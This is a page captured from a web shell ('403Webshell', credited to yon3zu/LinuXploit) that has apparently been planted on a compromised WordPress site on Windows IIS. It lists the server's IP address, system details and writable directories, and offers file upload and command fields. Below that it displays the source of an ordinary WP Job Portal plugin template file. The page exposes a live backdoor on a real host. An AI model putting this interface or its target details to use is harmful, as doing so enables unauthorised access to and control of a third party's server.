403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /HostingSpaces/admin/tickwaves.co.uk/wwwroot/wp-content/plugins/wp-job-portal/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /HostingSpaces/admin/tickwaves.co.uk/wwwroot/wp-content/plugins/wp-job-portal/templates/header.php
<?php if (!defined('ABSPATH')) die('Restricted Access'); ?>
<?php
/**
 * @param module 		module name - optional
 */
if (!isset($module)) {
	// if module name is not passed than pick from url
	$module = WPJOBPORTALrequest::getVar('wpjobportalme');
}


/*
show module wise flash messages
*/
if ($module) {
	$model = WPJOBPORTALincluder::getJSModel($module);
	if ($model) {
		$msgkey = $model->getMessagekey();
		WPJOBPORTALMessages::getLayoutMessage($msgkey);
	}
}


/*
show breadcrumbs
*/


/*
show menu for jobseeker and employer
*/
//include_once(WPJOBPORTAL_PLUGIN_PATH . 'includes/header.php');



/*
if there is any error, show error and return from page
*/
if (wpjobportal::$_error_flag != null &&  wpjobportal::$_error_flag_message != null) {
	echo wp_kses_post(wpjobportal::$_error_flag_message);
    return false;
}

Youez - 2016 - github.com/yon3zu
LinuXploit